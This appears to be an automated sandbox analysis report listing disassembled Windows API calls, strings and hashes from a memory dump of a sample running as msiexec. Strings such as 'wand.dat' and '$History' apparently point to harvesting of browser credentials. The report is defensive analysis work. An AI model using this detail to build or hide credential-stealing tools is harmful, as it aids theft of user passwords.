                                                                                                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
APIs
• wcscpy.MSVCRT ref: 0044475F
• wcscat.MSVCRT ref: 0044476E
• wcscat.MSVCRT ref: 0044477F
• wcscat.MSVCRT ref: 0044478E
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
• String ID: \StringFileInfo\
• API String ID: 102104167-2245444037
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
Similarity
• API ID: _memicmpwcslen
• String ID: @@@@$History
• API String ID: 1872909662-685208920
APIs
• memset.MSVCRT ref: 004100FB
• memset.MSVCRT ref: 00410112
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 00410141
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
• memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
• memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
• memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
• memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
                                                                                                                                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
APIs
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
• Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
• Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
• Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
• Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
• Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
• Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
APIs
• memset.MSVCRT ref: 00412057
  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
• GetKeyState.USER32(00000010), ref: 0041210D
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
• Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
• Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
• Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
APIs
• free.MSVCRT ref: 0040F561
• memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
• memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$free
• String ID: g4@
• API String ID: 2888793982-2133833424
• Opcode ID: f4c875be1691c16b6b0488e2c5ae259581ad0285ed380af5e7f19d00b6790c48
• Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
• Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
APIs
• memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
• memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
• memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
• Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
• Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
APIs
• memset.MSVCRT ref: 004144E7
  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
• memset.MSVCRT ref: 0041451A
• GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
• String ID:
• API String ID: 1127616056-0
• Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
• Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
• Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7507DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7507DF80,?,0041755F,?), ref: 00417478
• free.MSVCRT ref: 0041747F
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00412403
• RegisterClassW.USER32(?), ref: 00412428
• GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
• CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID:
• API String ID: 2678498856-0
APIs
• memset.MSVCRT ref: 0040F673
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
• strlen.MSVCRT ref: 0040F6A2
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
APIs
• memset.MSVCRT ref: 0040F6E2
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
• strlen.MSVCRT ref: 0040F70D
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: wcscpy$CloseHandle
• String ID: General
• API String ID: 3722638380-26480598
APIs
  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
• SetBkMode.GDI32(?,00000001), ref: 004143A2
• SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
• SetTextColor.GDI32(?,00C00000), ref: 004143BE
• GetStockObject.GDI32(00000000), ref: 004143C6
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
• String ID:
• API String ID: 764393265-0
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0
APIs
• memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
• memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
• GetModuleHandleW.KERNEL32(00000000), ref: 00413505
• DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
APIs
• wcschr.MSVCRT ref: 0040F79E
• wcschr.MSVCRT ref: 0040F7AC
  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                                          • String ID: F^@
                                                                                                                                                                                                          • API String ID: 568519121-3652327722
                                                                                                                                                                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                                                                                                          • String ID: WinPos
                                                                                                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                                                                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                          • API String ID: 1103273653-628097481
                                                                                                                                                                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                          • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$memset

APIs
• wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040A908
• free.MSVCRT ref: 0040A92B
• memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen

APIs
• wcslen.MSVCRT ref: 0040B1DE
• free.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B224
• memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen

APIs
• memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
  • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
• memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
• memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
• memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcmp$memcpy

APIs
• strlen.MSVCRT ref: 0040B0D8
• free.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B12C
• memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: free$memcpy$mallocstrlen

APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
